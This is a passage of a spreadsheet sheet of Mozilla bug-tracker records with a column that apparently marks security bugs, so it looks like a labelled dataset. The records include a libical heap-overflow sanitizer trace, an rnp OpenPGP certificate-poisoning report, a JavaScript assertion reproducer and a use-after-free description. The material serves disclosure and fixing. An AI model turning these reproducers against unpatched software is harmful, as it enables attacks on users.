    #5 0x4fa975 in LLVMFuzzerTestOneInput (/opt/libfuzzer/thunderbird_libical_fuzzer+0x4fa975)
    #6 0x43a681 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (/opt/libfuzzer/thunderbird_libical_fuzzer+0x43a681)
    #7 0x424327 in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) (/opt/libfuzzer/thunderbird_libical_fuzzer+0x424327)
    #8 0x42a4c1 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/opt/libfuzzer/thunderbird_libical_fuzzer+0x42a4c1)
    #9 0x453f62 in main (/opt/libfuzzer/thunderbird_libical_fuzzer+0x453f62)
    #10 0x7f28bc086b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
    #11 0x41dc49 in _start (/opt/libfuzzer/thunderbird_libical_fuzzer+0x41dc49)
0x60700000040f is located 1 bytes to the left of 80-byte region [0x607000000410,0x607000000460)
allocated by thread T0 here:
    #0 0x4cbb5d in malloc (/opt/libfuzzer/thunderbird_libical_fuzzer+0x4cbb5d)
    #1 0x4fe7bd in icalmemory_new_buffer /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icalmemory.c:266:15
    #2 0x51719b in icalparser_get_line /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icalparser.c:453:21
    #3 0x517e0d in icalparser_parse /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icalparser.c:621:13
    #4 0x4fd243 in icalparser_parse_string /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icalparser.c:1236:9
    #5 0x4fa975 in LLVMFuzzerTestOneInput (/opt/libfuzzer/thunderbird_libical_fuzzer+0x4fa975)
    #6 0x43a681 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (/opt/libfuzzer/thunderbird_libical_fuzzer+0x43a681)
    #7 0x424327 in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) (/opt/libfuzzer/thunderbird_libical_fuzzer+0x424327)
    #8 0x42a4c1 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/opt/libfuzzer/thunderbird_libical_fuzzer+0x42a4c1)
    #9 0x453f62 in main (/opt/libfuzzer/thunderbird_libical_fuzzer+0x453f62)
    #10 0x7f28bc086b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
SUMMARY: AddressSanitizer: heap-buffer-overflow /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icalparser.c:208:38 in parser_get_next_char
Expected results:
No heap buffer overflow.
When the vulnerable function in Thunderbird is replaced with current implementation in libical upstream (https://github.com/libical/libical/blob/master/src/libical/icalparser.c#L147) this bug doesn't manifest anymore.</t>
        </is>
      </c>
      <c r="X2823" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2824">
      <c r="A2824" t="n">
        <v>524229</v>
      </c>
      <c r="B2824" t="inlineStr">
        <is>
          <t>2009-10-23 16:33:51 -0700</t>
        </is>
      </c>
      <c r="C2824" t="inlineStr">
        <is>
          <t>Re-vamp extension template layout and code hook system</t>
        </is>
      </c>
      <c r="D2824" t="inlineStr">
        <is>
          <t>2010-02-22 15:33:17 -0800</t>
        </is>
      </c>
      <c r="E2824" t="n">
        <v>1</v>
      </c>
      <c r="F2824" t="n">
        <v>1</v>
      </c>
      <c r="G2824" t="n">
        <v>4</v>
      </c>
      <c r="H2824" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2824" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2824" t="inlineStr">
        <is>
          <t>Extensions</t>
        </is>
      </c>
      <c r="K2824" t="inlineStr">
        <is>
          <t>3.5</t>
        </is>
      </c>
      <c r="L2824" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2824" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2824" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2824" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2824" t="inlineStr"/>
      <c r="Q2824" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2824" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2824" t="inlineStr">
        <is>
          <t>Bugzilla 3.6</t>
        </is>
      </c>
      <c r="T2824" t="n">
        <v>1</v>
      </c>
      <c r="U2824" t="n">
        <v>0</v>
      </c>
      <c r="V2824" t="n">
        <v>7</v>
      </c>
      <c r="W2824" t="inlineStr">
        <is>
          <t>Here's what I want to do:
Code Hooks
----------
Bug 430014: Switch from using a lot of .pl files to a single "Hooks.pm" that contains subroutines for the hooks. This should handle any performance issues (and other issues) around code hooks.
Template Hooks
---------------
Bug 430012: Make extension templates *and hooks* get precompiled.
Bug 516404: Make sure that we never re-scan the whole directory structure every time we want to load a hook. (In general, make sure that template hooks perform well.)
Also, I want to re-work the paths, so that the ONLY valid path for looking up extension hooks is:
extensions/&lt;name&gt;/template/&lt;lang&gt;/hooks/
Instead of having a zillion places to look and piling all the hooks into the root template/&lt;lang&gt; directory for extensions.</t>
        </is>
      </c>
      <c r="X2824" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2825">
      <c r="A2825" t="n">
        <v>1666360</v>
      </c>
      <c r="B2825" t="inlineStr">
        <is>
          <t>2020-09-21 14:25:41 -0700</t>
        </is>
      </c>
      <c r="C2825" t="inlineStr">
        <is>
          <t>rnp trips over subkeys with invalid self signatures</t>
        </is>
      </c>
      <c r="D2825" t="inlineStr">
        <is>
          <t>2021-11-22 23:45:15 -0800</t>
        </is>
      </c>
      <c r="E2825" t="n">
        <v>1</v>
      </c>
      <c r="F2825" t="n">
        <v>1</v>
      </c>
      <c r="G2825" t="n">
        <v>3</v>
      </c>
      <c r="H2825" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2825" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J2825" t="inlineStr">
        <is>
          <t>Security: OpenPGP</t>
        </is>
      </c>
      <c r="K2825" t="inlineStr">
        <is>
          <t>78</t>
        </is>
      </c>
      <c r="L2825" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2825" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2825" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2825" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2825" t="inlineStr">
        <is>
          <t>[RNP][fixed-in-rnp]</t>
        </is>
      </c>
      <c r="Q2825" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2825" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S2825" t="inlineStr">
        <is>
          <t>88 Branch</t>
        </is>
      </c>
      <c r="T2825" t="n">
        <v>1</v>
      </c>
      <c r="U2825" t="n">
        <v>0</v>
      </c>
      <c r="V2825" t="n">
        <v>16</v>
      </c>
      <c r="W2825" t="inlineStr">
        <is>
          <t>Created attachment 9176994
encryption-subkey-bad.pgp
User Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Steps to reproduce:
Note: I attempted to submit the following issue to rnp.  I went to https://www.ribose.com/feedback/security, submitted the issue and got an error "Error sending feedback".  If someone has a better way of contacting rnp about such security issues, I'd appreciate a pointer.
Consider the following OpenPGP Certificate (attached below):
  Public-Key Packet, new CTB, 51 bytes
      Version: 4
      Creation time: 2020-09-21 12:46:13 UTC
      Pk algo: EdDSA Edwards-curve Digital Signature Algorithm
      Pk size: 256 bits
      Fingerprint: 4BC6 DDAA 8893 94D0 9C62  6631 54E9 563F B183 FFC6
      KeyID: 54E9 563F B183 FFC6
  Signature Packet, new CTB, 129 bytes
      Version: 4
      Type: DirectKey
      Pk algo: EdDSA Edwards-curve Digital Signature Algorithm
      Hash algo: SHA512
      Hashed area:
        Signature creation time: 2020-09-21 12:46:13 UTC (critical)
        Symmetric algo preferences: AES256
        Hash preferences: SHA512
        Key flags: CS (critical)
        Features: MDC
      Unhashed area:
        Issuer: 54E9 563F B183 FFC6
        Issuer Fingerprint: 4BC6 DDAA 8893 94D0 9C62  6631 54E9 563F B183 FFC6
      Digest prefix: 5681
      Level: 0 (signature over data)
  User ID Packet, new CTB, 57 bytes
      Value: Invalid Encryption Subkey &lt;encryption-subkey@example.org&gt;
  Signature Packet, new CTB, 132 bytes
      Version: 4
      Type: PositiveCertification
      Pk algo: EdDSA Edwards-curve Digital Signature Algorithm
      Hash algo: SHA512
      Hashed area:
        Signature creation time: 2020-09-21 12:46:13 UTC (critical)
        Symmetric algo preferences: AES256
        Hash preferences: SHA512
        Primary User ID: true (critical)
        Key flags: CS (critical)
        Features: MDC
      Unhashed area:
        Issuer: 54E9 563F B183 FFC6
        Issuer Fingerprint: 4BC6 DDAA 8893 94D0 9C62  6631 54E9 563F B183 FFC6
      Digest prefix: BF69
      Level: 0 (signature over data)
  Public-Subkey Packet, new CTB, 56 bytes
      Version: 4
      Creation time: 2020-09-21 12:46:13 UTC
      Pk algo: ECDH public key algorithm
      Pk size: 256 bits
      Fingerprint: EAC7 2FA2 5266 278C 512E  8F35 B60F 4310 804F 8535
      KeyID: B60F 4310 804F 8535
  Signature Packet, new CTB, 129 bytes
      Version: 4
      Type: SubkeyBinding
      Pk algo: EdDSA Edwards-curve Digital Signature Algorithm
      Hash algo: SHA512
      Hashed area:
        Signature creation time: 2020-09-21 12:46:13 UTC (critical)
        Key flags: Et (critical)
        Features: MDC
        Key expiration time: PT1S
      Unhashed area:
        Issuer: 54E9 563F B183 FFC6
        Issuer Fingerprint: 4BC6 DDAA 8893 94D0 9C62  6631 54E9 563F B183 FFC6
      Digest prefix: CDE2
      Level: 0 (signature over data)
  Public-Subkey Packet, new CTB, 56 bytes
      Version: 4
      Creation time: 2020-09-21 12:46:13 UTC
      Pk algo: ECDH public key algorithm
      Pk size: 256 bits
      Fingerprint: AC5C F91D D06C 518A 0142  B1E4 BC63 472A 109D 5859
      KeyID: BC63 472A 109D 5859
  Signature Packet, new CTB, 123 bytes
      Version: 4
      Type: SubkeyBinding
      Pk algo: EdDSA Edwards-curve Digital Signature Algorithm
      Hash algo: SHA512
      Hashed area:
        Signature creation time: 2020-09-21 12:46:13 UTC (critical)
        Key flags: EtEr (critical)
        Features: MDC
      Unhashed area:
        Issuer: 54E9 563F B183 FFC6
        Issuer Fingerprint: 4BC6 DDAA 8893 94D0 9C62  6631 54E9 563F B183 FFC6
      Digest prefix: 79EC
      Level: 0 (signature over data)
The certificate has two encryption-capable subkeys.  The first one has
an invalid self-signature, and is thus invalid:
  $ sq inspect encryption-subkey-bad.pgp 
  encryption-subkey-bad.pgp: OpenPGP Certificate.
      Fingerprint: 4BC6 DDAA 8893 94D0 9C62  6631 54E9 563F B183 FFC6
  Public-key algo: EdDSA Edwards-curve Digital Signature Algorithm
  Public-key size: 256 bits
    Creation time: 2020-09-21 12:46:13 UTC
        Key flags: certification, signing
           Subkey: AC5C F91D D06C 518A 0142  B1E4 BC63 472A 109D 5859
  Public-key algo: ECDH public key algorithm
  Public-key size: 256 bits
    Creation time: 2020-09-21 12:46:13 UTC
        Key flags: transport encryption, data-at-rest encryption
           UserID: Invalid Encryption Subkey &lt;encryption-subkey@example.org&gt;
               Bad Signature: V4(Signature4 { version: 4, typ: SubkeyBinding, pk_algo: EdDSA, hash_algo: SHA512, hashed_area: [Subpacket { critical: true, value: SignatureCreationTime(1600692373) }, Subpacket { critical: true, value: KeyFlags(Et) }, Subpacket { value: Features(MDC) }, Subpacket { value: KeyExpirationTime(1s) }], unhashed_area: [Subpacket { value: Issuer(KeyID("54E9 563F B183 FFC6")) }, Subpacket { value: IssuerFingerprint(Fingerprint("4BC6 DDAA 8893 94D0 9C62  6631 54E9 563F B183 FFC6")) }], digest_prefix: "CDE2", computed_digest: None, level: 0, mpis: EdDSA { r: 251 bits: 0613 F704 5023 23B0 3155 9634 DFB5 BC84 B31A 402D 9BBF E018 84CE 90CB 7C88 A6F5, s: 251 bits: 0492 E4EF D2D8 894A 83D1 D49B D2C6 322B 7666 215B 1D3C 01D2 0B1E 8D41 1074 5A0F } })
Since the OpenPGP Certificate still has a valid encryption subkey, it
should be usable.  For instance, GnuPG correctly ignores the subkey
that does not have a valid binding signature, and it is possible to
encrypt a message to that key using gpg.
  $ gpg --import encryption-subkey-bad.pgp 
  gpg: key 0x54E9563FB183FFC6: 1 bad signature
  gpg: key 0x54E9563FB183FFC6: public key "Invalid Encryption Subkey &lt;encryption-subkey@example.org&gt;" imported
  gpg: Total number processed: 1
  gpg:               imported: 1
  $ gpg -k 0x54E9563FB183FFC6
  pub   ed25519/0x54E9563FB183FFC6 2020-09-21 [SC]
        Key fingerprint = 4BC6 DDAA 8893 94D0 9C62  6631 54E9 563F B183 FFC6
  uid                   [ unknown] Invalid Encryption Subkey &lt;encryption-subkey@example.org&gt;
  sub   cv25519/0xBC63472A109D5859 2020-09-21 [E]
  $ echo foo | gpg -e -r 0x54E9563FB183FFC6 &gt;/dev/null
  ...
  $ echo $?
  0
When importing the OpenPGP Certificate into rnp, rnp does not suggest
that the subkey or the certificate is invalid in anyway:
  $ rm $T/*
  $ src/rnpkeys/rnpkeys --homedir=$T --import encryption-subkey-bad.pgp
  [init_file_src() /home/us/neal/work/pep/rnp/src/librepgp/stream-common.cpp:408] can't stat '/tmp/tmp.MhdvXtVrFA/pubring.gpg'
  wrong pubring path
  [signature_validate() /home/us/neal/work/pep/rnp/src/lib/crypto/signatures.cpp:217] wrong lbits
  pub   255/EdDSA 54e9563fb183ffc6 2020-09-21 [SC]
        4bc6ddaa889394d09c62663154e9563fb183ffc6
  uid           Invalid Encryption Subkey &lt;encryption-subkey@example.org&gt;
  sub   255/ECDH b60f4310804f8535 2020-09-21 [E]
        eac72fa25266278c512e8f35b60f4310804f8535
  sub   255/ECDH bc63472a109d5859 2020-09-21 [E]
        ac5cf91dd06c518a0142b1e4bc63472a109d5859
But, it is not possible to encrypt to the OpenPGP Certificate:
  $ src/rnp/rnp --homedir=$T --encrypt -r 54e9563fb183ffc6 foo.txt
  [signature_validate() /home/us/neal/work/pep/rnp/src/lib/crypto/signatures.cpp:217] wrong lbits
  [encrypted_add_recipient() /home/us/neal/work/pep/rnp/src/librepgp/stream-write.cpp:518] attempt to use invalid key as recipient
The problem appears to be in src/lib/pgp-key.cpp:find_suitable_key:
this function iterates over all of the keys and returns the first key
that has the encryption-capable flag set.  But, it doesn't check that
the signature is actually valid before doing so.  Since
find_suitable_key encounters the bad subkey first, and that subkey has
the required flags, it returns that key.  When rnp goes to encrypt to
that key, it actually checks that the key is valid, and correctly
rejects it.  But, it doesn't bother to try and encrypt the message to
the other, valid subkey.
  https://github.com/rnpgp/rnp/blob/6a5fb89/src/lib/pgp-key.cpp#L1875
An attacker can use this to poison OpenPGP Certificates.  They
attacker could insert a subkey with an invalid binding signature, and
convince the victim to import it.  This could be done in a targetted
way, or simply as a type of vandalism, e.g., by uploading corrupted
certificates to key servers that don't validate signatures, like the
SKS pool.
Unfortunately, importing a good version of the key (one without the
subkey, and its invalid signature) will not fix the problem, because
rnp merges the key in place, and the bad subkey is still first.
Instead, a user must somehow remove the key from their keyring.</t>
        </is>
      </c>
      <c r="X2825" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2826">
      <c r="A2826" t="n">
        <v>691746</v>
      </c>
      <c r="B2826" t="inlineStr">
        <is>
          <t>2011-10-04 07:17:06 -0700</t>
        </is>
      </c>
      <c r="C2826" t="inlineStr">
        <is>
          <t>Assertion failure: JSID_IS_STRING(id) || JSID_IS_INT(id), at jswatchpoint.cpp:207</t>
        </is>
      </c>
      <c r="D2826" t="inlineStr">
        <is>
          <t>2013-01-04 13:24:12 -0800</t>
        </is>
      </c>
      <c r="E2826" t="n">
        <v>1</v>
      </c>
      <c r="F2826" t="n">
        <v>1</v>
      </c>
      <c r="G2826" t="n">
        <v>3</v>
      </c>
      <c r="H2826" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2826" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2826" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2826" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2826" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2826" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2826" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2826" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2826" t="inlineStr">
        <is>
          <t>[sg:critical][qa-]</t>
        </is>
      </c>
      <c r="Q2826" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2826" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2826" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2826" t="n">
        <v>1</v>
      </c>
      <c r="U2826" t="n">
        <v>0</v>
      </c>
      <c r="V2826" t="n">
        <v>22</v>
      </c>
      <c r="W2826" t="inlineStr">
        <is>
          <t>The following test asserts on mozilla-central revision a896a9e237a0 (options -m -n):
var obj = {};
obj.watch(QName(), function () {});
gc();
S-s because this is a gc related assert. It does not crash though in optimized builds. The original test was much more complex due to the missing gc() call, which I added manually.</t>
        </is>
      </c>
      <c r="X2826" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2827">
      <c r="A2827" t="n">
        <v>1287204</v>
      </c>
      <c r="B2827" t="inlineStr">
        <is>
          <t>2016-07-15 13:59:28 -0700</t>
        </is>
      </c>
      <c r="C2827" t="inlineStr">
        <is>
          <t>nsNodeUtils::CloneAndAdopt() incorrectly handles ReparentWrapper failure</t>
        </is>
      </c>
      <c r="D2827" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E2827" t="n">
        <v>1</v>
      </c>
      <c r="F2827" t="n">
        <v>1</v>
      </c>
      <c r="G2827" t="n">
        <v>3</v>
      </c>
      <c r="H2827" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2827" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2827" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K2827" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2827" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2827" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2827" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2827" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2827" t="inlineStr">
        <is>
          <t>[adv-main49+][adv-esr45.4+]</t>
        </is>
      </c>
      <c r="Q2827" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2827" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2827" t="inlineStr">
        <is>
          <t>mozilla51</t>
        </is>
      </c>
      <c r="T2827" t="n">
        <v>1</v>
      </c>
      <c r="U2827" t="n">
        <v>0</v>
      </c>
      <c r="V2827" t="n">
        <v>15</v>
      </c>
      <c r="W2827" t="inlineStr">
        <is>
          <t>Boiled down a bit, the code looks like this:
  NodeInfo *nodeInfo = aNode-&gt;mNodeInfo;
  RefPtr&lt;NodeInfo&gt; newNodeInfo;
  if (nodeInfoManager) {
    ...
    newNodeInfo = // create a new node info
    nodeInfo = newNodeInfo;
  }
  ...
  if (...) {
    ...
  } else if (nodeInfoManager) {
    ...
    aNode-&gt;mNodeInfo.swap(newNodeInfo);
    ...
    if (aReparentScope) {
      ...
      if (...) {
        ...
        if (NS_FAILED(rv)) {
          aNode-&gt;mNodeInfo.swap(nodeInfo);
          return rv;
        }
      }
    }
  }
After the first swap, aNode-&gt;mNodeInfo and nodeInfo both contain the new node (I'm assuming no method we call changed aNode-&gt;mNodeInfo), while newNodeInfo contains the original node.
The second swap is bogus: it is swapping a refcounted value and a raw pointer (it seems unfortunate that this is legal...). If these were not equal, you'd have a bad refcount problem (aNode-&gt;mNodeInfo would underflow its refcount when it was destroyed, and nodeInfo would leak), but it looks like they are the same, so we don't leak any objects. 
Presumably the second swap is supposed to be newNodeInfo instead of nodeInfo.
As far as I can tell there's no security issue here, but given that wrappers and refcounting are involved I wanted to get a second opinion before making this bug public.</t>
        </is>
      </c>
      <c r="X2827" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2828">
      <c r="A2828" t="n">
        <v>16719</v>
      </c>
      <c r="B2828" t="inlineStr">
        <is>
          <t>1999-10-18 14:53:56 -0700</t>
        </is>
      </c>
      <c r="C2828" t="inlineStr">
        <is>
          <t>Form Bugs causing lost OS and Component data in bug reports</t>
        </is>
      </c>
      <c r="D2828" t="inlineStr">
        <is>
          <t>2000-02-03 16:49:00 -0800</t>
        </is>
      </c>
      <c r="E2828" t="n">
        <v>1</v>
      </c>
      <c r="F2828" t="n">
        <v>1</v>
      </c>
      <c r="G2828" t="n">
        <v>5</v>
      </c>
      <c r="H2828" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2828" t="inlineStr">
        <is>
          <t>mozilla.org</t>
        </is>
      </c>
      <c r="J2828" t="inlineStr">
        <is>
          <t>Miscellaneous</t>
        </is>
      </c>
      <c r="K2828" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2828" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2828" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N2828" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2828" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2828" t="inlineStr"/>
      <c r="Q2828" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R2828" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2828" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2828" t="n">
        <v>1</v>
      </c>
      <c r="U2828" t="n">
        <v>0</v>
      </c>
      <c r="V2828" t="n">
        <v>13</v>
      </c>
      <c r="W2828" t="inlineStr">
        <is>
          <t>I can't be sure, but I think that some of the bug reports may be losing
Component and OS data due to the problem identified in item 2 under
"Expected behavior" in the original entry in Bug 16152.
This problem, if it exists, will be hindering the engineering workflow
by depriving engineers of information that should have been captured
by enter_bug.cgi.
To be specific, in current win32 builds (at least, I'm guessing Linux
on PC at least as well, maybee ALL) of Mozilla, if a combobox cannot be
fully displayed on the screen, activating the combobox may change
the selected item in the combobox to the top (or other, yikes) item
regardless of what was previously selected (or prestuffed).
In practice this will happen up to a screen size of 1024 by 768
with the Win95 shell (or, presumably, fvwm95 in X) for at least
the OS combobox, if the scrollbar is not moved before the combobox
is activated.
I am seeing way too many "all" and "other" for OS, especially from Linux
bug reports, and "ActiveX Wrapper" for component, when they are not
appropriate and, at least for OS, should have been something else,
based on enter_bug.cgi's field initialization.
Bug 16631 and Bug 16663 seem to show this problem, among others.
The only way I can think of to test this is to enter bug reports using
mozilla, intentionally activate comboboxes that are "too close" to the
bottom of the screen after the proper selection has been made, without
making a selection, and carefully observe what show_bug.cgi shows
to see if any of the comboboxes are showing the wrong item.
Needless to say, if this is really happening, somebody may want to
up the priority on bug 16152.</t>
        </is>
      </c>
      <c r="X2828" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2829">
      <c r="A2829" t="n">
        <v>1243555</v>
      </c>
      <c r="B2829" t="inlineStr">
        <is>
          <t>2016-01-27 14:45:23 -0800</t>
        </is>
      </c>
      <c r="C2829" t="inlineStr">
        <is>
          <t>EventListenerManager::HandleEventInternal() has a raw pointer to a docshell which can be destructed (via event-handling) before we finish using it</t>
        </is>
      </c>
      <c r="D2829" t="inlineStr">
        <is>
          <t>2016-09-22 14:47:38 -0700</t>
        </is>
      </c>
      <c r="E2829" t="n">
        <v>1</v>
      </c>
      <c r="F2829" t="n">
        <v>1</v>
      </c>
      <c r="G2829" t="n">
        <v>3</v>
      </c>
      <c r="H2829" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2829" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2829" t="inlineStr">
        <is>
          <t>DOM: Events</t>
        </is>
      </c>
      <c r="K2829" t="inlineStr">
        <is>
          <t>44 Branch</t>
        </is>
      </c>
      <c r="L2829" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2829" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2829" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2829" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2829" t="inlineStr">
        <is>
          <t>[adv-main45+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q2829" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2829" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2829" t="inlineStr">
        <is>
          <t>mozilla47</t>
        </is>
      </c>
      <c r="T2829" t="n">
        <v>1</v>
      </c>
      <c r="U2829" t="n">
        <v>0</v>
      </c>
      <c r="V2829" t="n">
        <v>17</v>
      </c>
      <c r="W2829" t="inlineStr">
        <is>
          <t>I filed bug 1243536 for an innocuous code-cleanup opportunity, but smaug noticed there was actually a security bug that my patch fixed, so I'm re-filing as a security bug.
The code from a security perspective is:
&gt; 1162           nsDocShell* docShell;
[...]
&gt; 1166           if (mIsMainThreadELM &amp;&amp;
&gt; 1167               listener-&gt;mListenerType != Listener::eNativeListener) {
&gt; 1168             nsCOMPtr&lt;nsIDocShell&gt; docShellComPtr = GetDocShellForTarget();
&gt; 1169             if (docShellComPtr) {
&gt; 1170               docShell = static_cast&lt;nsDocShell*&gt;(docShellComPtr.get());
[...]
&gt; 1180               }
&gt; 1181             }
&gt; 1182           }
&gt; 1183 
&gt; 1184           if (NS_FAILED(HandleEventSubType(listener, *aDOMEvent, aCurrentTarget))) {
&gt; 1185             aEvent-&gt;mFlags.mExceptionHasBeenRisen = true;
&gt; 1186           }
&gt; 1187 
&gt; 1188           if (needsEndEventMarker) {
&gt; 1189             timelines-&gt;AddMarkerForDocShell(
&gt; 1190               docShell, "DOMEvent", MarkerTracingType::END);
&gt; 1191           }
The problem is that the event-handling code at line 1184 could run arbitrary JS (I think) and destroy our document &amp; docshell, which means our final "AddMarkerForDocShell" call at line 1189 could be be passing in a pointer to deleted memory -- |docShell|.
The fix is easy -- just hold onto |docShell| in a refcounted pointer.</t>
        </is>
      </c>
      <c r="X2829" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2830">
      <c r="A2830" t="n">
        <v>706058</v>
      </c>
      <c r="B2830" t="inlineStr">
        <is>
          <t>2011-11-29 04:35:18 -0800</t>
        </is>
      </c>
      <c r="C2830" t="inlineStr">
        <is>
          <t>Individual crash reports are not accessible</t>
        </is>
      </c>
      <c r="D2830" t="inlineStr">
        <is>
          <t>2011-12-28 10:40:11 -0800</t>
        </is>
      </c>
      <c r="E2830" t="n">
        <v>1</v>
      </c>
      <c r="F2830" t="n">
        <v>1</v>
      </c>
      <c r="G2830" t="n">
        <v>4</v>
      </c>
      <c r="H2830" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2830" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J2830" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2830" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2830" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2830" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2830" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2830" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2830" t="inlineStr"/>
      <c r="Q2830" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2830" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S2830" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2830" t="n">
        <v>1</v>
      </c>
      <c r="U2830" t="n">
        <v>0</v>
      </c>
      <c r="V2830" t="n">
        <v>7</v>
      </c>
      <c r="W2830" t="inlineStr">
        <is>
          <t>Load https://crash-stats.mozilla.com/report/index/4de8a011-4a79-4b1e-8ca2-0e8492111129
Get: "This page isn't redirecting properly"
Expect: The crash report.</t>
        </is>
      </c>
      <c r="X2830" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2831">
      <c r="A2831" t="n">
        <v>1492823</v>
      </c>
      <c r="B2831" t="inlineStr">
        <is>
          <t>2018-09-20 05:04:32 -0700</t>
        </is>
      </c>
      <c r="C2831" t="inlineStr">
        <is>
